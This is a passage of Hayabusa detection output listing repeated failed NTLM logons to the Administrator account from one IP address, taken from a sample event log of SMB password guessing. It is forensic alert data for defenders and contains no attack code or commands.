01:51:13.965 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FEirUFRscaOwTuAg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:14.005 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RwQgMM9H1oN4te9Z | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:14.056 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JbGILYTcFwtYbDk1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:14.168 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: p5KzNsgWvyUhNEHd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:14.213 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KGvwbOtP3A5eDKCZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:14.261 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YZvtNNX511hIleST | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:14.299 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lJBRTeW6OQtNrt5u | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:14.348 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Hovgq99STVt2GzrO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:14.380 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4kpT3gf0VCAVuVSa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:14.428 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tiB04AvkYp0PP3n1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:14.479 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PPluKgaiT10oC35V | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:14.527 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: 8nCOM9uUeqv9QBx6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:14.574 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dSPrrNCh2FSWZKbI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:14.621 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aLDnCjr4pSdKAMX7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:14.673 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: G0UnmfB7lcXKEAvn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:14.722 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ogjMSxcUw7cF5dMa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:14.773 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 75uB8ejsSV5CbagM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 
01:51:14.814 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5MMHLnyrzBQxluHn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:14.862 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5QXLn6fpmR52RBAz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:14.908 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KcdlrSUzcFNpaK5v | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:14.944 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VJjiRO5rJzZ8XtqP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:14.986 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ncBraDdG2htkHjXU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:15.033 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Lo9DNrL44Z2S2SYR | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:15.075 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QKcFiKC5QiIoHtxy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:15.120 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sqvq9GwuPCO15lUV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:15.164 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4XzgtJ3qUmkFiIY5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:15.215 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: V1wc1Hjb4AK0Np1q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:15.253 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PKYNy0JyxIlFusMC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:15.298 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: IrcKp13ut9M0pCi0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:15.341 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: B3lJSH0r8iHAVhPF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:15.392 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ju3lCbvbwvkIKsBo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:15.435 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dQOHcZeAKQG6wHhC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:15.474 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QBPkgoKDLABqdSQb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:15.524 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wqj4xOCsJg1j3IIh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 
01:51:15.561 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XhBIu6wUPHc3DZAy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:15.604 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: W0fI1GhH5YTOHbNN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:15.652 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: b7mLOWiojillZNYH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:15.702 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 37dknpwsl8j1WRWi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:15.748 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gzVum7a21sQe3fMt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:15.788 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JCFPSQmywelTXg74 | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:15.832 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jCqb6TVV14hVX3NY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:15.888 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3qJsJrxVARedOdd3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:15.936 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: s7iNkrkBNEbXPK0B | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:15.975 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Bio4zciNRolyeHc1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:16.026 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IFf1vN5MgAIsdZvx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:16.072 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: zWhgUQSWAycVdYoS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:16.116 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ugHUJZuKHYfUHXWS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:16.168 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AUeUmYa72BzHfyhK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:16.212 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ksydur7W1mUoOZAE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:16.261 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YNIzopnsXH6OjcUs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:16.296 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SQljJkaWs8bcaOI1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 
01:51:16.344 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1jejn6ZMo564m7ok | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:16.440 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KrpBO1SCHpt27CRM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:16.484 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ifPePsozBYRLCU3k | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:16.521 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vve4r8QwaMLKrrcX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:16.569 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: i9ArElR5k8yLefWu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:16.604 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4a1Y126C516BaGcz | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:16.652 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VL7PnrO2dLsEbebQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:16.686 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GGTlLZ8J9f2PtiuL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:16.728 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6sVwPFs7bhJgJwRt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:16.772 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dgQNHL9etdHdRw9Q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:16.813 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mjZrWpJlN2CwbxFc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:16.858 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: 72lmrp6neWGKAURB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:16.896 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CnTi5dgoWunYutJ9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:16.936 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Vi2fTl07llsJEYyt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:16.980 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Hohh8KS1eYtojEya | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:17.020 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RsuC8F95UmsOSKvs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:17.064 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: be8UJ0EN7XS5r0b6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 
01:51:17.116 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CgJlVYanwWKAhJ7O | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:17.156 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zthqCIkr1nKtqcCj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:17.200 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tzmi8I402j71q5Wg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:17.244 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: m0U3NYl8QEbgeJry | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:17.277 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uJJ1FOUIBInGkKPQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:17.316 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bu0X5RisszAHEs0X | IP Addr: 192.168.198.149 | AuthPackage: 
